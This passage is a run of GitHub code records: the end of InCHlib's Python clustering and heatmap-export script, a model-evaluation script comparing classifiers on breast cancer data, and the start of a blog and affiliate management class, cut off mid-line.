print(\"Calculating distance threshold...\")\n if cluster_count >= self.tree.count:\n return -1\n \n i = 0\n count = cluster_count + 1\n test_step = self.tree.dist/2\n\n while test_step >= 0.1:\n count = len(set([c for c in hcluster.fcluster(self.clustering, i, \"distance\")]))\n if count < cluster_count:\n if i == 0:\n return 0\n i = i - test_step\n test_step = test_step/2\n elif count == cluster_count:\n return i\n else:\n i += test_step\n\n return i+test_step*2\n\n def export_cluster_heatmap_as_json(self, filename=None, minify=False, dump=True):\n \"\"\"Returns cluster heatmap in a JSON format or exports it to the file specified by the filename parameter.\"\"\"\n dendrogram = self.dendrogram\n if minify:\n dendrogram_json = json.dumps(dendrogram)\n dendrogram_json = self.__minify_data(dendrogram_json)\n elif dump:\n dendrogram_json = json.dumps(dendrogram, indent=4)\n else:\n dendrogram_json = dendrogram\n \n if filename:\n output = open(filename, \"w\")\n output.write(dendrogram_json)\n return dendrogram_json\n\n def __minify_data(self, data):\n return jsmin.jsmin(str(data))\n\n def export_cluster_heatmap_as_html(self, htmldir=\".\"):\n \"\"\"Export simple HTML page with embedded cluster heatmap and dependencies to given directory.\"\"\"\n if not os.path.exists(htmldir):\n os.makedirs(htmldir)\n dendrogram_json = json.dumps(self.dendrogram, indent=4)\n template = \"\"\"\n \n \n \n \n \n \n\n \n
\n \n \"\"\".format(dendrogram_json)\n\n lib2url = {\n \"inchlib-1.1.0.js\": \"https://openscreen.cz/software/inchlib/static/js/inchlib-1.1.0.js\",\n \"jquery-2.0.3.min.js\": \"https://openscreen.cz/software/inchlib/static/js/jquery-2.0.3.min.js\",\n \"kinetic-v5.1.0.min.js\": \"https://openscreen.cz/software/inchlib/static/js/kinetic-v5.1.0.min.js\"\n }\n \n for lib, url in lib2url.items():\n try:\n source = requests.get(url)\n source_html = source.content\n\n with open(os.path.join(htmldir, lib), \"w\") as output:\n output.write(source_html)\n \n except Exception as e:\n raise Exception(\"\\nCan't download file {}.\\nPlease check your internet connection and try again.\\nIf the error persists there can be something wrong with the InCHlib server.\\n\".format(url))\n\n with open(os.path.join(htmldir, \"inchlib.html\"), \"w\") as output:\n output.write(template)\n\n def add_metadata_from_file(self, metadata_file, delimiter, header=True, metadata_compressed_value=\"median\"):\n \"\"\"Adds metadata from csv file.\n Metadata_compressed_value specifies the resulted value when the data are compressed (median/mean/frequency)\"\"\"\n self.metadata_compressed_value = metadata_compressed_value\n self.metadata, self.metadata_header = self.__read_metadata_file__(metadata_file, delimiter, header)\n self.__connect_metadata_to_data__()\n\n def add_metadata(self, metadata, header=True, metadata_compressed_value=\"median\"):\n \"\"\"Adds metadata in a form of list of lists (tuples).\n Metadata_compressed_value specifies the resulted value when the data are compressed (median/mean/frequency)\"\"\"\n self.metadata_compressed_value = metadata_compressed_value\n self.metadata, self.metadata_header = self.__read_metadata__(metadata, header)\n self.__connect_metadata_to_data__()\n\n def __connect_metadata_to_data__(self):\n print(\"Adding metadata: {} rows\".format(len(self.metadata)))\n self.dendrogram[\"metadata\"] = {}\n\n if self.metadata_header:\n self.dendrogram[\"metadata\"][\"feature_names\"] = self.metadata_header\n\n self.dendrogram[\"metadata\"][\"nodes\"] = self.__connect_additional_data_to_data__(self.metadata, self.metadata_compressed_value)\n\n def __read_metadata__(self, metadata, header):\n metadata_header = []\n rows = metadata\n metadata = {}\n data_start = 0\n\n if header:\n metadata_header = rows[0][1:]\n data_start = 1\n \n for row in rows[data_start:]:\n metadata[str(row[0])] = [r for r in row[1:]]\n\n return metadata, metadata_header\n\n \n def __read_metadata_file__(self, metadata_file, delimiter, header):\n csv_reader = csv.reader(open(metadata_file, \"r\"), delimiter=delimiter)\n metadata_header = []\n rows = [row for row in csv_reader]\n metadata = {}\n data_start = 0\n\n if header:\n metadata_header = rows[0][1:]\n data_start = 1\n \n for row in rows[data_start:]:\n metadata_id = str(row[0])\n metadata[metadata_id] = [r for r in row[1:]]\n\n return metadata, metadata_header\n\n def add_column_metadata(self, column_metadata, header=True):\n \"\"\"Adds column metadata in a form of list of lists (tuples). \n Column metadata doesn't have header row, first item in each row is used as label instead\"\"\"\n if header:\n self.column_metadata = [r[1:] for r in column_metadata]\n self.column_metadata_header = [r[0] for r in column_metadata]\n else:\n self.column_metadata = [r for r in column_metadata]\n self.column_metadata_header = False\n\n self.__check_column_metadata_length__()\n self.__add_column_metadata_to_data__()\n\n def add_column_metadata_from_file(self, column_metadata_file, delimiter=\",\", header=True):\n \"\"\"Adds column metadata from csv file. Column metadata doesn't have header.\"\"\"\n csv_reader = csv.reader(open(column_metadata_file, \"r\"), delimiter=delimiter)\n column_metadata = [row for row in csv_reader]\n self.add_column_metadata(column_metadata, header)\n\n def __check_column_metadata_length__(self):\n features_length = len(self.data[0])\n for row in self.column_metadata:\n if features_length != len(row):\n raise Exception(\"Column metadata length and features length must be the same.\")\n\n def __add_column_metadata_to_data__(self):\n if self.cluster_object.clustering_axis == \"both\":\n self.column_data = self.cluster_object.__reorder_data__(self.column_metadata, self.cluster_object.data_order)\n self.dendrogram[\"column_metadata\"] = {\"features\":self.column_metadata}\n if self.column_metadata_header:\n self.dendrogram[\"column_metadata\"][\"feature_names\"] = self.column_metadata_header\n\n def add_alternative_data_from_file(self, alternative_data_file, delimiter, header, alternative_data_compressed_value):\n \"\"\"Adds alternative_data from csv file.\"\"\"\n self.alternative_data_compressed_value = alternative_data_compressed_value\n self.add_alternative_data(self.__read_alternative_data_file__(alternative_data_file, delimiter), header, alternative_data_compressed_value)\n\n def add_alternative_data(self, alternative_data, header, alternative_data_compressed_value):\n \"\"\"Adds alternative data in a form of list of lists (tuples).\"\"\"\n self.alternative_data_compressed_value = alternative_data_compressed_value\n\n if self.cluster_object.clustering_axis == \"both\":\n alternative_data = self.__reorder_alternative_data__(alternative_data)\n\n self.dendrogram[\"alternative_data\"] = {}\n self.alternative_data_header = False\n \n if header:\n self.alternative_data_header = alternative_data[0][1:]\n self.dendrogram[\"alternative_data\"][\"feature_names\"] = self.alternative_data_header\n alternative_data = alternative_data[1:]\n\n self.alternative_data = self.__read_alternative_data__(alternative_data)\n\n print(\"Adding alternative data: {} rows\".format(len(self.alternative_data)))\n self.dendrogram[\"alternative_data\"][\"nodes\"] = self.__connect_additional_data_to_data__(self.alternative_data, self.alternative_data_compressed_value)\n\n def __reorder_alternative_data__(self, alternative_data):\n alt_data_without_id = [r[1:] for r in alternative_data]\n reordered_data = self.cluster_object.__reorder_data__(alt_data_without_id, self.cluster_object.data_order)\n rows = []\n for i, r in enumerate(alternative_data):\n row = [r[0]]\n row.extend(reordered_data[i])\n rows.append(row)\n return rows\n\n def __read_alternative_data_file__(self, alternative_data_file, delimiter):\n csv_reader = csv.reader(open(alternative_data_file, \"r\"), delimiter=delimiter)\n return [r for r in csv_reader]\n\n def __read_alternative_data__(self, alternative_data):\n return {str(r[0]):r[1:] for r in alternative_data}\n\n def __connect_additional_data_to_data__(self, additional_data, compressed_value):\n if len(set(additional_data.keys()) & set(self.data_names)) == 0:\n print(\"No data objects correspond with the clustered data according to their IDs. No additional data added.\")\n return\n\n if not self.dendrogram:\n raise Exception(\"You must create dendrogram before adding data to it.\")\n\n node2additional_data = {}\n\n leaves = {n:node for n, node in self.dendrogram[\"data\"][\"nodes\"].items() if node[\"count\"] == 1}\n\n if not self.compress:\n for leaf_id, leaf in leaves.items():\n try:\n node2additional_data[leaf_id] = additional_data[leaf[\"objects\"][0]]\n except Exception as e:\n continue\n else:\n compressed_value2fnc = {\n \"median\": lambda values: round(numpy.median(col), 3),\n \"mean\": lambda values: round(numpy.average(col), 3),\n \"frequency\": lambda values: self.__get_most_frequent__(col)\n }\n\n for leaf in leaves:\n objects = []\n for item in leaves[leaf][\"objects\"]:\n try:\n objects.append(additional_data[item])\n except Exception as e:\n continue\n\n cols = zip(*objects)\n row = []\n cols = [list(c) for c in cols]\n\n for col in cols:\n if compressed_value in compressed_value2fnc:\n try:\n col = [float(c) for c in col]\n value = compressed_value2fnc[compressed_value](col)\n except ValueError:\n value = compressed_value2fnc[\"frequency\"](col)\n \n else:\n raise Exception(\"Unkown type of metadata_compressed_value: {}. Possible values are: median, mean, frequency.\".format(self.metadata_compressed_value))\n \n row.append(value)\n\n node2additional_data[leaf] = row\n\n return node2additional_data\n\n def __get_most_frequent__(self, col):\n freq2val = {col.count(v):v for v in set(col)}\n value = freq2val[max(freq2val.keys())]\n return value\n\nclass Cluster():\n \"\"\"Class for data clustering\"\"\"\n\n def __init__(self):\n self.write_original = False\n\n def read_csv(self, filename, delimiter=\",\", header=False, missing_values=False, datatype=\"numeric\", compound_structure_field=False, add_structures=False, label_field=False):\n \"\"\"Reads data from the CSV file\"\"\"\n self.filename = filename\n csv_reader = csv.reader(open(self.filename, \"r\"), delimiter=delimiter)\n rows = [row for row in csv_reader]\n self.read_data(rows, header, missing_values, datatype, compound_structure_field, add_structures, label_field)\n\n def read_data(self, rows, header=False, missing_values=False, datatype=\"numeric\", compound_structure_field=False, add_structures=False, label_field=False):\n \"\"\"Reads data in a form of list of lists (tuples)\"\"\"\n self.datatype = datatype\n self.missing_values = missing_values\n self.header = header\n self.compound_structure_field = compound_structure_field\n self.label_field = label_field\n self.labels = False\n self.smiles = False\n self.rdmols = False\n self.fpobjs = False\n self.add_structures = add_structures\n\n data_start = 0\n\n if self.header and self.compound_structure_field and self.compound_structure_field in rows[0]:\n print(\"Reading compound structures...\")\n csf_index = rows[0].index(self.compound_structure_field)\n self.smiles = [row[csf_index] for row in rows[1:]]\n \n for row in rows:\n row.pop(csf_index)\n\n if self.header and self.label_field:\n label_index = rows[0].index(self.label_field)\n self.labels = [row[label_index] for i, row in enumerate(rows[1:])]\n \n for row in rows:\n row.pop(label_index)\n\n if self.header:\n self.header = rows[0][1:]\n data_start = 1\n \n self.data_names = [str(row[0]) for row in rows[data_start:]]\n self.data = numpy.array([row[1:] for row in rows[data_start:]])\n self.original_data = copy.deepcopy(self.data)\n\n if not self.missing_values is False:\n self.data, self.missing_values_indexes = self.__impute_missing_values__(self.data)\n self.original_data = self.__return_missing_values__(copy.deepcopy(self.data), self.missing_values_indexes)\n\n self.original_data = [[float(val) if not val is None else None for val in r] for r in self.original_data]\n self.data = [[float(val) if not val is None else None for val in r] for r in self.data]\n \n def __impute_missing_values__(self, data):\n datatype2impute = {\"numeric\": {\"strategy\":\"mean\", \n \"value\": lambda value: round(float(value), 3)}, \n \"binary\": {\"strategy\":\"most_frequent\", \n \"value\": lambda value: int(value)}\n }\n\n if not self.datatype in DISTANCES:\n raise Exception(\"\".join([\"You can choose only from data types: \", \", \".join(DISTANCES.keys())]))\n\n missing_values_indexes = []\n print(self.data)\n for i, row in enumerate(self.data):\n missing_values_indexes.append([j for j, v in enumerate(row) if v in self.missing_values])\n\n for j, value in enumerate(row):\n if value in self.missing_values:\n data[i][j] = numpy.nan\n\n imputer = SimpleImputer(missing_values=numpy.nan, strategy=datatype2impute[self.datatype][\"strategy\"], keep_empty_features=True)\n imputed_data = [list(row) for row in imputer.fit_transform(self.data)]\n imputed_data = [[datatype2impute[self.datatype][\"value\"](value) for value in row] for row in imputed_data]\n return imputed_data, missing_values_indexes\n \n def normalize_data(self, feature_range=(0,1), write_original=False):\n \"\"\"Normalizes data to a scale from 0 to 1. When write_original is set to True, \n the normalized data will be clustered, but original data will be written to the heatmap.\"\"\"\n self.write_original = write_original\n min_max_scaler = MinMaxScaler(feature_range)\n self.data = min_max_scaler.fit_transform(self.data)\n self.data = [[round(v, 3) for v in row] for row in self.data]\n\n def cluster_data(self, row_distance=\"euclidean\", row_linkage=\"single\", axis=\"row\", column_distance=\"euclidean\", column_linkage=\"ward\", cluster_by_structures=False):\n \"\"\"Performs clustering according to the given parameters.\n @datatype - numeric/binary\n @row_distance/column_distance - see. DISTANCES variable\n @row_linkage/column_linkage - see. LINKAGES variable\n @axis - row/both\n \"\"\"\n self.clustered_by_structures = False\n\n if cluster_by_structures and RDKIT and self.compound_structure_field:\n print(\"Generating structure fingerprints...\")\n self.rdmols = [Chem.MolFromSmiles(smiles) for smiles in self.smiles]\n self.fpobjs = [FP2FNC[\"ecfp4\"](rdmol).ToList() for rdmol in self.rdmols]\n self.datatype = \"binary\"\n self.data = self.fpobjs\n \n if not row_distance in DISTANCES[self.datatype]:\n print(\"Distance set to jaccard...\")\n row_distance = \"jaccard\"\n\n self.clustered_by_structures = True\n\n print(\"Clustering rows:\", row_distance, row_linkage)\n self.clustering_axis = axis\n row_linkage = str(row_linkage)\n \n if row_linkage in RAW_LINKAGES:\n self.clustering = fastcluster.linkage(self.data, method=row_linkage, metric=row_distance)\n\n else:\n self.distance_vector = fastcluster.pdist(self.data, row_distance)\n\n if self.datatype == \"numeric\" and not row_distance in DISTANCES[self.datatype]:\n raise Exception(\"\".join([\"When clustering numeric data you must choose from these distance measures: \", \", \".join(DISTANCES[self.datatype])]))\n elif (self.datatype == \"binary\" or self.datatype == \"nominal\") and not row_distance in DISTANCES[self.datatype]:\n raise Exception(\"\".join([\"When clustering binary or nominal data you must choose from these distance measures: \", \", \".join(DISTANCES[self.datatype])]))\n\n self.clustering = fastcluster.linkage(self.distance_vector, method=str(row_linkage))\n\n\n if not self.missing_values is False:\n self.data = self.__return_missing_values__(self.data, self.missing_values_indexes)\n \n self.column_clustering = []\n\n if axis == \"both\" and len(self.data[0]) > 2:\n print(\"Clustering columns:\", column_distance, column_linkage)\n self.__cluster_columns__(column_distance, column_linkage)\n \n if self.write_original or self.datatype == \"nominal\" or self.clustered_by_structures:\n self.data = self.original_data\n\n def __return_missing_values__(self, data, missing_values_indexes):\n for i, indexes in enumerate(missing_values_indexes):\n if indexes:\n for index in indexes:\n data[i][index] = None\n return data\n\n def __cluster_columns__(self, column_distance, column_linkage):\n self.data = [list(col) for col in zip(*self.data)]\n if not self.missing_values is False:\n self.data, missing_values_indexes = self.__impute_missing_values__(self.data)\n \n self.column_clustering = fastcluster.linkage(self.data, method=column_linkage, metric=column_distance)\n self.data_order = hcluster.leaves_list(self.column_clustering)\n\n if not self.missing_values is False:\n self.data = self.__return_missing_values__(self.data, missing_values_indexes)\n \n self.data = list(zip(*self.data))\n self.data = self.__reorder_data__(self.data, self.data_order)\n self.original_data = self.__reorder_data__(self.original_data, self.data_order)\n if self.header:\n self.header = self.__reorder_data__([self.header], self.data_order)[0]\n\n def __reorder_data__(self, data, order):\n for i in range(len(data)):\n reordered_data = []\n for j in order:\n reordered_data.append(data[i][j])\n reordered_data.reverse()\n data[i] = reordered_data\n\n return data\n\ndef _process_(arguments):\n c = Cluster()\n c.read_csv(\n filename=arguments.data_file, \n delimiter=arguments.data_delimiter, \n header=arguments.data_header, \n missing_values=arguments.missing_values, \n datatype=arguments.datatype,\n compound_structure_field=arguments.compound_structure_field,\n add_structures=arguments.add_structures,\n label_field=arguments.label_field\n )\n \n if arguments.normalize:\n c.normalize_data(feature_range=(0,1), write_original=arguments.write_original)\n\n c.cluster_data(row_distance=arguments.row_distance,\n row_linkage=arguments.row_linkage,\n axis=arguments.axis,\n column_distance=arguments.column_distance,\n column_linkage=arguments.column_linkage,\n cluster_by_structures=arguments.cluster_by_structures\n )\n\n d = Dendrogram(c)\n d.create_cluster_heatmap(compress=arguments.compress, compressed_value=arguments.compressed_value, write_data=not arguments.dont_write_data)\n\n if arguments.color_clusters > 1:\n d.color_clusters(cluster_count=arguments.color_clusters)\n \n if arguments.metadata:\n d.add_metadata_from_file(metadata_file=arguments.metadata, delimiter=arguments.metadata_delimiter, header=arguments.metadata_header, metadata_compressed_value=arguments.metadata_compressed_value)\n \n if arguments.column_metadata:\n d.add_column_metadata_from_file(column_metadata_file=arguments.column_metadata, delimiter=arguments.column_metadata_delimiter, header=arguments.column_metadata_header)\n\n if arguments.alternative_data:\n d.add_alternative_data_from_file(alternative_data_file=arguments.alternative_data, delimiter=arguments.alternative_data_delimiter, header=arguments.alternative_data_header, alternative_data_compressed_value=arguments.alternative_data_compressed_value)\n \n if arguments.output_file or arguments.html_dir:\n if arguments.output_file:\n d.export_cluster_heatmap_as_json(arguments.output_file, minify=arguments.minify, dump=arguments.json_dump)\n else:\n d.export_cluster_heatmap_as_html(arguments.html_dir)\n else:\n print(d.export_cluster_heatmap_as_json(filename=None, minify=arguments.minify, dump=arguments.json_dump))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\"data_file\", type=str, help=\"csv(text) data file with delimited values\")\n parser.add_argument(\"-o\", \"--output_file\", type=str, help=\"the name of output file\")\n parser.add_argument(\"-html\", \"--html_dir\", type=str, help=\"the directory to store HTML page with dependencies\")\n parser.add_argument(\"-rd\", \"--row_distance\", type=str, default=\"euclidean\", help=\"set the distance to use for clustering rows\")\n parser.add_argument(\"-rl\", \"--row_linkage\", type=str, default=\"ward\", help=\"set the linkage to use for clustering rows\")\n parser.add_argument(\"-cd\", \"--column_distance\", type=str, default=\"euclidean\", help=\"set the distance to use for clustering columns (only when clustering by both axis -a parameter)\")\n parser.add_argument(\"-cl\", \"--column_linkage\", type=str, default=\"ward\", help=\"set the linkage to use for clustering columns (only when clustering by both axis -a parameter)\")\n parser.add_argument(\"-a\", \"--axis\", type=str, default=\"row\", help=\"define clustering axis (row/both)\")\n parser.add_argument(\"-dt\", \"--datatype\", type=str, default=\"numeric\", help=\"specify the type of the data (numeric/binary)\")\n parser.add_argument(\"-dd\", \"--data_delimiter\", type=str, default=\",\", help=\"delimiter of values in data file\")\n parser.add_argument(\"-m\", \"--metadata\", type=str, default=None, help=\"csv(text) metadata file with delimited values\")\n parser.add_argument(\"-md\", \"--metadata_delimiter\", type=str, default=\",\", help=\"delimiter of values in metadata file\")\n parser.add_argument(\"-dh\", \"--data_header\", default=False, help=\"whether the first row of data file is a header\", action=\"store_true\")\n parser.add_argument(\"-mh\", \"--metadata_header\", default=False, help=\"whether the first row of metadata file is a header\", action=\"store_true\")\n parser.add_argument(\"-c\", \"--compress\", type=int, default=0, help=\"compress the data to contain maximum of specified count of rows\")\n parser.add_argument(\"-cv\", \"--compressed_value\", type=str, default=\"median\", help=\"the resulted value from merged rows when the data are compressed (median/mean/frequency)\")\n parser.add_argument(\"-mcv\", \"--metadata_compressed_value\", type=str, default=\"median\", help=\"the resulted value from merged rows of metadata when the data are compressed (median/mean/frequency)\")\n parser.add_argument(\"-dwd\", \"--dont_write_data\", default=False, help=\"don't write clustered data to the inchlib data format\", action=\"store_true\")\n parser.add_argument(\"-n\", \"--normalize\", default=False, help=\"normalize data to [0, 1] range\", action=\"store_true\")\n parser.add_argument(\"-wo\", \"--write_original\", default=False, help=\"cluster normalized data but write the original ones to the heatmap\", action=\"store_true\")\n parser.add_argument(\"-cm\", \"--column_metadata\", type=str, default=None, help=\"csv(text) metadata file with delimited values without header\")\n parser.add_argument(\"-cmd\", \"--column_metadata_delimiter\", type=str, default=\",\", help=\"delimiter of values in column metadata file\")\n parser.add_argument(\"-cmh\", \"--column_metadata_header\", default=False, help=\"whether the first column of the column metadata is the row label ('header')\", action=\"store_true\")\n parser.add_argument(\"-mv\", \"--missing_values\", type=str, nargs=\"+\", default=False, help=\"define the string representating missing values in the data\")\n parser.add_argument(\"-ad\", \"--alternative_data\", type=str, default=None, help=\"csv(text) alternative data file with delimited values\")\n parser.add_argument(\"-adh\", \"--alternative_data_header\", default=False, help=\"whether the first row of alternative data file is a header\", action=\"store_true\")\n parser.add_argument(\"-add\", \"--alternative_data_delimiter\", type=str, default=\",\", help=\"delimiter of values in alternative data file\")\n parser.add_argument(\"-adcv\", \"--alternative_data_compressed_value\", type=str, default=\"median\", help=\"the resulted value from merged rows of alternative data when the data are compressed (median/mean/frequency)\")\n parser.add_argument(\"-min\", \"--minify\", default=False, help=\"minify the InCHlib format\", action=\"store_true\")\n parser.add_argument(\"-dump\", \"--json_dump\", default=True, help=\"dump the InCHlib format as JSON\", action=\"store_true\")\n parser.add_argument(\"-cc\", \"--color_clusters\", type=int, default=0, help=\"color defined number of clusters\")\n parser.add_argument(\"-csf\", \"--compound_structure_field\", type=str, default=False, help=\"the name of a column with a compound structure\")\n parser.add_argument(\"-as\", \"--add_structures\", default=False, help=\"add structure smiles to the output json format\", action=\"store_true\")\n parser.add_argument(\"-cbs\", \"--cluster_by_structures\", default=False, help=\"cluster by compound structures (fingerprints)\", action=\"store_true\")\n parser.add_argument(\"-lf\", \"--label_field\", type=str, default=False, help=\"set a label field name in case it is in the data file\")\n \n args = parser.parse_args()\n _process_(args)\n\n","repo_name":"skutac/InCHlib.js","sub_path":"inchlib_clust/inchlib_clust_dev.py","file_name":"inchlib_clust_dev.py","file_ext":"py","file_size_in_byte":39173,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"77"} +{"seq_id":"44021599221","text":"#!/usr/bin/env python3\n\n\t#####################################################\n\t## WISCONSIN BREAST CANCER MACHINE LEARNING ##\n\t#####################################################\n\n# Project by Raul Eulogio\n\n# Project found at: https://www.inertia7.com/projects/3\n\n\n\"\"\"\nModel Evaluation\n\"\"\"\n# Import Packages -----------------------------------------------\nimport matplotlib.pyplot as plt\nfrom knn import fit_knn\nfrom random_forest import fit_rf\nfrom neural_networks import fit_nn\nfrom data_extraction import training_set, class_set\nfrom data_extraction import test_set, test_class_set\nfrom data_extraction import training_set_scaled, test_set_scaled\nfrom helper_functions import cross_val_metrics\nfrom produce_model_metrics import produce_model_metrics\nfrom terminaltables import AsciiTable\nfrom sklearn.metrics import classification_report\n\n\n\n# Calling up metrics from the model scripts\n# KNN -----------------------------------------------------------\nmetrics_knn = produce_model_metrics(fit_knn, test_set,\n\ttest_class_set, 'knn')\n# Call each value from dictionary\npredictions_knn = metrics_knn['predictions']\naccuracy_knn = metrics_knn['accuracy']\nfpr = metrics_knn['fpr']\ntpr = metrics_knn['tpr']\nauc_knn = metrics_knn['auc']\n\n# Test Error Rate\ntest_error_rate_knn = 1 - accuracy_knn\n\n# Cross Validated Score\nmean_cv_knn, std_error_knn = cross_val_metrics(fit_knn,\n training_set,\n class_set,\n 'knn',\n print_results = False)\n\n# RF ------------------------------------------------------------\nmetrics_rf = produce_model_metrics(fit_rf, test_set,\n\ttest_class_set, 'rf')\n# Call each value from dictionary\npredictions_rf = metrics_rf['predictions']\naccuracy_rf = metrics_rf['accuracy']\nfpr2 = metrics_rf['fpr']\ntpr2 = metrics_rf['tpr']\nauc_rf = metrics_rf['auc']\n\n# Test Error Rate\ntest_error_rate_rf = 1 - accuracy_rf\n\n# Cross Validated Score\nmean_cv_rf, std_error_rf = cross_val_metrics(fit_rf,\n training_set,\n class_set,\n 'rf',\n print_results = False)\n\n# NN ------------------------------------------------------------\nmetrics_nn = produce_model_metrics(fit_nn, test_set_scaled,\n\ttest_class_set, 'nn')\n\n# Call each value from dictionary\npredictions_nn = metrics_nn['predictions']\naccuracy_nn = metrics_nn['accuracy']\nfpr3 = metrics_nn['fpr']\ntpr3 = metrics_nn['tpr']\nauc_nn = metrics_nn['auc']\n\n# Test Error Rate\ntest_error_rate_nn = 1 - accuracy_nn\n\n# Cross Validated Score\nmean_cv_nn, std_error_nn = cross_val_metrics(fit_nn,\n training_set_scaled,\n class_set,\n 'nn',\n print_results = False)\n\n# Main ----------------------------------------------------------\nif __name__ == '__main__':\n\t# Populate list for human readable table from terminal line\n\ttable_data = [[ 'Model/Algorithm', 'Test Error Rate',\n 'False Negative for Test Set', 'Area under the Curve for ROC',\n 'Cross Validation Score'],\n ['Kth Nearest Neighbor',\n round(test_error_rate_knn, 3),\n 5,\n round(auc_knn, 3),\n \"Accuracy: {0: 0.3f} (+/- {1: 0.3f})\"\\\n .format(mean_cv_knn, std_error_knn)],\n [ 'Random Forest',\n round(test_error_rate_rf, 3),\n 3,\n round(auc_rf, 3),\n \"Accuracy: {0: 0.3f} (+/- {1: 0.3f})\"\\\n\t\t\t\t.format(mean_cv_rf, std_error_rf)],\n [ 'Neural Networks' ,\n round(test_error_rate_nn, 3),\n 1,\n round(auc_nn, 3),\n \"Accuracy: {0: 0.3f} (+/- {1: 0.3f})\"\\\n\t\t\t\t.format(mean_cv_nn, std_error_nn)]]\n\n\t# convert to AsciiTable from terminaltables package\n\ttable = AsciiTable(table_data)\n\n\ttarget_names = ['Benign', 'Malignant']\n\n\tprint('Classification Report for Kth Nearest Neighbor:')\n\tprint(classification_report(predictions_knn,\n\t\ttest_class_set,\n\t\ttarget_names = target_names))\n\n\tprint('Classification Report for Random Forest:')\n\tprint(classification_report(predictions_rf,\n\t\ttest_class_set,\n\t\ttarget_names = target_names))\n\n\tprint('Classification Report for Neural Networks:')\n\tprint(classification_report(predictions_nn,\n\t\ttest_class_set,\n\t\ttarget_names = target_names))\n\n\tprint(\"Comparison of different logistics relating to model evaluation:\")\n\tprint(table.table)\n\n\t# Plotting ROC Curves----------------------------------------\n\tf, ax = plt.subplots(figsize=(10, 10))\n\n\tplt.plot(fpr, tpr, label='Kth Nearest Neighbor ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_knn),\n \tcolor = 'deeppink',\n \tlinewidth=1)\n\tplt.plot(fpr2, tpr2,label='Random Forest ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_rf),\n \tcolor = 'red',\n \tlinestyle=':',\n \tlinewidth=2)\n\tplt.plot(fpr3, tpr3,label='Neural Networks ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_nn),\n \tcolor = 'purple',\n \tlinestyle=':',\n \tlinewidth=3)\n\n\tax.set_axis_bgcolor('#fafafa')\n\tplt.plot([0, 1], [0, 1], 'k--', lw=2)\n\tplt.plot([0, 0], [1, 0], 'k--', lw=2, color = 'black')\n\tplt.plot([1, 0], [1, 1], 'k--', lw=2, color = 'black')\n\tplt.xlim([-0.01, 1.0])\n\tplt.ylim([0.0, 1.05])\n\tplt.xlabel('False Positive Rate')\n\tplt.ylabel('True Positive Rate')\n\tplt.title('ROC Curve Comparison For All Models')\n\tplt.legend(loc=\"lower right\")\n\tplt.show()\n\n\t# Zoomed in\n\tf, ax = plt.subplots(figsize=(10, 10))\n\tplt.plot(fpr, tpr, label='Kth Nearest Neighbor ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_knn),\n \tcolor = 'deeppink',\n \tlinewidth=1)\n\tplt.plot(fpr2, tpr2,label='Random Forest ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_rf),\n \tcolor = 'red',\n \tlinestyle=':',\n \tlinewidth=3)\n\tplt.plot(fpr3, tpr3,label='Neural Networks ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_nn),\n \tcolor = 'purple',\n \tlinestyle=':',\n \tlinewidth=3)\n\n\tax.set_axis_bgcolor('#fafafa')\n\tplt.plot([0, 1], [0, 1], 'k--', lw=2) # Add Diagonal line\n\tplt.plot([0, 0], [1, 0], 'k--', lw=2, color = 'black')\n\tplt.plot([1, 0], [1, 1], 'k--', lw=2, color = 'black')\n\tplt.xlim([-0.001, 0.2])\n\tplt.ylim([0.7, 1.05])\n\tplt.xlabel('False Positive Rate')\n\tplt.ylabel('True Positive Rate')\n\tplt.title('ROC Curve Comparison For All Models (Zoomed)')\n\tplt.legend(loc=\"lower right\")\n\tplt.show()\n\n\tprint('fin \\n:)')\n","repo_name":"raviolli77/machineLearning_breastCancer_Python","sub_path":"src/python/model_eval.py","file_name":"model_eval.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"77"} +{"seq_id":"6443453188","text":"from Utils.CustomLogging import CLogger\nfrom Utils.CustomExceptions import CExcept\nfrom datetime import datetime\n\n\nclass Opportunities:\n __blogs = list()\n __affiliates = list()\n\n def create_blog(self, p_title: str, p_subheading: str, p_content: str, p_created_by: str):\n title, subheading, content, created_by =\\\n self.__validate_blog_creation(p_title, p_subheading, p_content, p_created_by)\n self.__blogs.append({\n \"blog_id\": len(self.__blogs) + 1,\n \"title\": title,\n \"subheading\": subheading,\n \"content\": content,\n \"created_by\": created_by,\n \"created_at\": datetime.now(),\n \"claps\": 0\n })\n return \"Blog created successfully\"\n\n def show_blogs(self, blog_id=-1):\n filtered_blogs = []\n if blog_id > 0:\n filtered_blogs = list(filter(lambda b: b.blog_id == blog_id, self.__blogs))\n else:\n filtered_blogs = self.__blogs\n return len(filtered_blogs), filtered_blogs\n\n def become_an_affiliate(self, p_affiliate_name: str, p_promoted_social_networks: list, p_min_num_of_proms_per_week: int, p_social_status: int):\n affiliate_name, promoted_social_networks, min_num_of_proms_per_week, \\\n social_status, desc_social_status, min_earn = \\\n self.__validate_affiliates(p_affiliate_name, p_promoted_social_networks, p_min_num_of_proms_per_week, p_social_status)\n self.__affiliates.append({\n \"affiliate_id\": len(self.__affiliates) + 1,\n \"affiliate_name\": affiliate_name,\n \"promoted_social_networks\": promoted_social_networks,\n \"min_num_of_proms_per_week\": min_num_of_proms_per_week,\n \"id_social_status\": social_status,\n \"description_social_status\": desc_social_status,\n \"min_earn\": min_earn\n })\n return \"Congratulations on your role\"\n\n def get_affiliates(self, affiliate_id=-1):\n filtered_affiliates = []\n if affiliate_id > 0:\n filtered_affiliates = list(filter(lambda b: b.blog_id == affiliate_id, self.__affiliates))\n else:\n filtered_affiliates = self.__affiliates\n return len(filtered_affiliates), filtered_affiliates\n\n @staticmethod\n def __validate_blog_creation(title: str, subheading: str, content: str, created_by: str):\n if title.strip() == \"\":\n CExcept(\"Title cannot be blank.\")\n elif content.strip() == \"\":\n CExcept(\"Content cannot be blank.\")\n elif created_by.strip() == \"\":\n CExcept(\"Created by cannot be blank\")\n\n ret_title = title\n if len(title) > 100:\n ret_title = title[0:100]\n CLogger(\"Title should be less than or equal to 100 characters length\")\n\n ret_subheading = subheading\n if len(subheading) > 